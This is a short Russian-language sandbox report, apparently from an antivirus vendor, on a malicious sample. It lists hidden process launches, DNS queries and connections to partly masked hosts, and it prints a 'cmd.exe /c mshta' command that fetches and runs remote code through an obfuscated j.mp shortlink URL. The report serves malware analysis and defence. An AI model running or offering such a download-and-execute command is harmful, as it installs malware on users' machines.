Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\ping.exe'
- '<SYSTEM32>\cmd.exe' /c mshta http://81###########721723%8123801284971721723@j.mp/asixsatharauneesoij
Сетевая активность
Подключается к
- 'j.#p':80
- 'tu#######nikyho.blogspot.com':443
- 'bl##ger.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
TCP
Запросы HTTP GET
- http://j.#p/asixsatharauneesoij
Другие
- 'tu#######nikyho.blogspot.com':443
- 'bl##ger.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'fo###.gstatic.com':443
UDP
- DNS ASK j.#p
- DNS ASK tu#######nikyho.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK go#####analytics.com
- DNS ASK fo###.gstatic.com
Другое
Ищет следующие окна
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\ping.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c mshta http://81###########721723%8123801284971721723@j.mp/asixsatharauneesoij' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://81###########721723%8123801284971721723@j.mp/asixsatharauneesoij
